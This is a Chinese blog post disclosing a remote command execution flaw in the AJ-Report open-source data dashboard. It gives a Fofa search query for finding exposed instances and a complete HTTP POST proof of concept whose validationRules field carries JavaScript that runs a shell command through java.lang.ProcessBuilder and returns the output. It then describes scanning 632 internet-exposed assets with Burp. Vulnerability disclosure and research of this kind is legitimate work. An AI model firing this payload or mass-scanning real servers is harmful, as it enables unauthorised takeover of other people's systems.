首页 > 其他分享 >AJ-Report开源数据大屏存在远程命令执行漏洞

AJ-Report开源数据大屏存在远程命令执行漏洞

时间:2024-05-19 09:18:53浏览次数:26  
标签:java application ss AJ Report 大屏 new 漏洞

漏洞描述:

该平台可以通过post方式在validationRules参数对应值中进行命令执行,可以获得服务器权限,登陆管理后台接管大屏。如果被不法分子利用,书写反动标语,危害后果十分严重

Fofa:

title="AJ-Report"

POC:

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
new java.lang.ProcessBuilder(\"id\")创建一个新的ProcessBuilder对象,配置想要执行的命令
start()方法启动这个命令的执行进程,返回Process对象,通过这个对象可以和启动的进程进行交互
getInputStream()方法用于获取执行命令后生成的输出
使用BufferedReader和InputStreamReader将输入流转换成可读的格式,并逐行读读取输出
用一个循环读取所有行,并将它们添加到字符串ss中,最后返回这个字符串

漏洞复现

在fofa中搜索资产,共有632条数据匹配

image-20240517111806884

将数据导出,在burp上对Host进行爆破

image-20240517111926845

都返回了405,目前fofa中搜索到的资产均无该漏洞

标签:java,application,ss,AJ,Report,大屏,new,漏洞
From: https://www.cnblogs.com/LeouMaster/p/18200054

相关文章

  • 智慧园区可视化大屏设计
    首先,让我们来了解一下什么是智慧园区可视化大屏。简单来说,它是一种将复杂的数据通过图形化的方式展示出来的技术。这种技术的出现,让我们可以更直观、更清晰地理解数据,从而做出更准确的决策。     那么,为什么我们要讨论智慧园区可视化大屏设计呢?因为,它不仅仅是一种......
  • 03--JQuery、Ajax
    jQuery与AjaxjQuery是一个曾经火遍大江南北的一个Javascript的第三方库jQuery的理念:writelessdomore.其含义就是让前端程序员从繁琐的js代码中解脱出来.我们来看看是否真的能解脱出来jQuery的版本:jQuery一共提出过3个大版本.分别是1.x,2.x和3.x.注意:虽然目前最新的......
  • msvc 获取c++类内存布局 /d1 reportAllClassLayout
     visualstudio配置获取所有类内存布局/d1reportAllClassLayout或者指定类/d1reportSingleClassLayoutXXXclass  编译时输出:     ps:https://www.openrce.org/articles/full_view/23   【原文地址】https://blog.csdn.net/qq_29542611/article......
  • 智慧工厂之眼:大屏可视化管理的无限可能
    在数字化浪潮席卷全球的今天,智慧工厂已不再是科幻小说中的概念,而是成为了现代工业发展的新引擎。 智慧工厂可视化大屏,不仅仅是一块显示屏,更是工厂运行的“大脑”。通过这块屏幕,我们可以实时掌握工厂的每一个角落、每一道工序的运行情况。从原材料的入库,到生产线的作业,再到成品......
  • vue3 前端大屏项目适配方法
    1scale()方法//屏幕内的内容//样式部分.contain{width:100vw;height:200vh;background:url(.pic);backgrouns-size:cover}.screen{display:inline-block;width:1920px;//设计稿的宽度height:1080px;//设计稿的高度transform-origin:l......
  • 解决ajax请求参数过多导致参数被截断的问题
    最近发现了个问题:ajaxpost请求查询参数数量动态变化有200-250000个,当参数超过一定数量N时,post传到后台接的参数就只有N个,多出的参数都没附到请求中,这也是奇怪的事情,浏览器对参数的个数有限制。jsconstpayload={date:"2024-05-10",sn:[]};for(leti=1;i<1000......
  • 大屏自适应
    exportconstAutoScale=(targetEl,options,root)=>{constel=document.querySelector(targetEl);if(!el)thrownewError("初始化失败");const{width,height}=options;el.style.transformOrigin='topleft';el.s......
  • 震撼视觉:全球冰川数据大屏揭示冰川之美与奥秘
    在浩瀚无垠的宇宙中,地球以其独特的蓝色光环吸引着人们的目光。而在这颗蓝色星球上,冰川这一大自然的杰作,更是以其壮美与神秘,让人们心驰神往。 从阿尔卑斯山脉的冰川到南极洲的冰盖,从格陵兰岛的冰山到喜马拉雅山脉的雪山,这些冰川在数据大屏上以高清画质呈现,仿佛让人置身于冰川世......
  • Ajax
    Ajax笔记1.Ajax简介AJAX即“AsynchronousJavascriptAndXML”(异步JavaScript和XML)。AJAX不是一种新的编程语言,而是一种使用现有标准的新方法。它是一种用于从网页访问Web服务器的技术。AJAX允许您在不重新加载页面的情况下向服务器发出请求。AJAX可以与服务器通信,交......
  • P10227 [COCI 2023/2024 #3] Slučajna Cesta 题解
    P10227[COCI2023/2024#3]SlučajnaCesta题解知识点期望DP,树形(换根)DP,组合数学。题意分析一棵树,每个点都有点权,每一条边的方向分布都是等概率的,问从每个点出发,有路走就一直走的情况下,所途径的点的权值总和的期望值。思路分析这明显是一个树形DP,且需要变成换根DP......